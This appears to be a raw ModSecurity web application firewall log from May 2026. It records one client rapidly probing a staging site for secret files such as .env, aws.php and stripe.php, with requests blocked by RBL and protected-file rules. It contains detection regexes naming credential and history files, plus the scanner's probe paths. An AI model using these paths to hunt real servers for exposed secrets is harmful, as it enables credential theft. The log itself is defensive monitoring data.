[Tue May 26 15:31:02.373306 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:41758] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUDwAAAFE"]
[Tue May 26 15:31:02.373406 2026] [security2:error] [pid 715645:tid 715872] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUEQAAAGE"]
[Tue May 26 15:31:02.413748 2026] [security2:error] [pid 715645:tid 715820] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUEgAAAC0"]
[Tue May 26 15:31:02.419960 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUFQAAAHs"]
[Tue May 26 15:31:02.433169 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:41794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config.php"] [unique_id "ahVvXnVGgMGh8k213RgUHAAAAEU"]
[Tue May 26 15:31:02.460860 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUGwAAACw"]
[Tue May 26 15:31:02.503757 2026] [security2:error] [pid 715645:tid 715815] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT4QAAACg"]
[Tue May 26 15:31:02.524090 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:41744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUHQAAADg"]
[Tue May 26 15:31:02.530994 2026] [security2:error] [pid 715645:tid 715843] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUIAAAAEQ"]
[Tue May 26 15:31:02.537317 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/config/.env"] [unique_id "ahVvXnVGgMGh8k213RgULAAAAGw"]
[Tue May 26 15:31:02.549279 2026] [security2:error] [pid 715645:tid 715845] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUIwAAAEY"]
[Tue May 26 15:31:02.557953 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUKQAAAGU"]
[Tue May 26 15:31:02.558667 2026] [security2:error] [pid 715645:tid 715853] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUJwAAAE4"]
[Tue May 26 15:31:02.584092 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgULQAAACY"]
[Tue May 26 15:31:02.601642 2026] [security2:error] [pid 715645:tid 715807] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgULgAAACA"]
[Tue May 26 15:31:02.603873 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:41758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/aws.php"] [unique_id "ahVvXnVGgMGh8k213RgULwAAACI"]
[Tue May 26 15:31:02.618045 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:41812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/config.inc.php"] [unique_id "ahVvXnVGgMGh8k213RgUNgAAABw"]
[Tue May 26 15:31:02.647097 2026] [security2:error] [pid 715645:tid 715835] [client 195.178.110.199:41738] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUMAAAADw"]
[Tue May 26 15:31:02.647937 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:41628] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUMQAAABI"]
[Tue May 26 15:31:02.658259 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUNQAAAAM"]
[Tue May 26 15:31:02.675606 2026] [security2:error] [pid 715645:tid 715888] [client 195.178.110.199:41788] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUMwAAAHE"]
[Tue May 26 15:31:02.740533 2026] [security2:error] [pid 715645:tid 715797] [client 195.178.110.199:41674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUNwAAABY"]
[Tue May 26 15:31:02.767684 2026] [security2:error] [pid 715645:tid 715884] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUPQAAAG0"]
[Tue May 26 15:31:02.796825 2026] [security2:error] [pid 715645:tid 715822] [client 195.178.110.199:41774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/config.php"] [unique_id "ahVvXnVGgMGh8k213RgURQAAAC8"]
[Tue May 26 15:31:02.796894 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:41826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/module.config.php"] [unique_id "ahVvXnVGgMGh8k213RgURAAAAA8"]
[Tue May 26 15:31:02.805212 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:41744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUPwAAAFQ"]
[Tue May 26 15:31:02.808145 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUQgAAAD0"]
[Tue May 26 15:31:02.815822 2026] [security2:error] [pid 715645:tid 715852] [client 195.178.110.199:41746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUQwAAAE0"]
[Tue May 26 15:31:02.820638 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:41788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/env.php"] [unique_id "ahVvXnVGgMGh8k213RgUSQAAABU"]
[Tue May 26 15:31:02.857032 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUSAAAABE"]
[Tue May 26 15:31:02.869666 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUSgAAAB8"]
[Tue May 26 15:31:02.878472 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUSwAAAFI"]
[Tue May 26 15:31:02.883088 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:41738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/stripe.php"] [unique_id "ahVvXnVGgMGh8k213RgUTQAAAFE"]
[Tue May 26 15:31:02.885384 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:41834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUTAAAAHg"]
[Tue May 26 15:31:02.889656 2026] [security2:error] [pid 715645:tid 715872] [client 195.178.110.199:41674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/nexmo.php"] [unique_id "ahVvXnVGgMGh8k213RgUTgAAAGE"]
[Tue May 26 15:31:02.953233 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUUwAAAHs"]
[Tue May 26 15:31:02.954493 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUVQAAAHQ"]
[Tue May 26 15:31:03.023664 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:41810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUXAAAACg"]
[Tue May 26 15:31:03.031671 2026] [security2:error] [pid 715645:tid 715878] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUWwAAAGc"]
[Tue May 26 15:31:03.050663 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:41706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUXQAAAFk"]
[Tue May 26 15:31:03.078267 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUYAAAAGw"]
[Tue May 26 15:31:03.078577 2026] [security2:error] [pid 715645:tid 715777] [client 195.178.110.199:41834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUYQAAAAI"]
[Tue May 26 15:31:03.090724 2026] [security2:error] [pid 715645:tid 715874] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUZAAAAGM"]
[Tue May 26 15:31:03.095691 2026] [security2:error] [pid 715645:tid 715780] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUZwAAAAU"]
[Tue May 26 15:31:03.142133 2026] [security2:error] [pid 715645:tid 715847] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUaAAAAEg"]
[Tue May 26 15:31:03.161009 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUawAAAGU"]
[Tue May 26 15:31:03.222831 2026] [security2:error] [pid 715645:tid 715816] [client 195.178.110.199:41810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUcgAAACk"]
[Tue May 26 15:31:03.224806 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUewAAABw"]
[Tue May 26 15:31:03.239438 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUegAAACI"]
[Tue May 26 15:31:03.241303 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:41744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/crm/.env"] [unique_id "ahVvX3VGgMGh8k213RgUfwAAAB4"]
[Tue May 26 15:31:03.252855 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/current/.env"] [unique_id "ahVvX3VGgMGh8k213RgUhAAAABM"]
[Tue May 26 15:31:03.267748 2026] [security2:error] [pid 715645:tid 715837] [client 114.119.158.46:23697] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahVvX3VGgMGh8k213RgUiAAAAD4"]
[Tue May 26 15:31:03.296661 2026] [security2:error] [pid 715645:tid 715828] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUhwAAADU"]
[Tue May 26 15:31:03.307355 2026] [security2:error] [pid 715645:tid 715865] [client 195.178.110.199:41834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUggAAAFo"]
[Tue May 26 15:31:03.307511 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUhgAAAFA"]
[Tue May 26 15:31:03.331494 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUiwAAAGs"]
[Tue May 26 15:31:03.349959 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUjAAAAHU"]
[Tue May 26 15:31:03.357374 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUjwAAAFQ"]
[Tue May 26 15:31:03.372230 2026] [security2:error] [pid 715645:tid 715852] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUkgAAAE0"]
[Tue May 26 15:31:03.373837 2026] [security2:error] [pid 715645:tid 715861] [client 195.178.110.199:41628] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/demo/.env"] [unique_id "ahVvX3VGgMGh8k213RgUkwAAAFY"]
[Tue May 26 15:31:03.398503 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/development/.env"] [unique_id "ahVvX3VGgMGh8k213RgUlAAAAB8"]
[Tue May 26 15:31:03.402339 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/dev/.env"] [unique_id "ahVvX3VGgMGh8k213RgUlQAAAFI"]
[Tue May 26 15:31:03.406638 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:41810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/cron/.env"] [unique_id "ahVvX3VGgMGh8k213RgUlgAAAFE"]
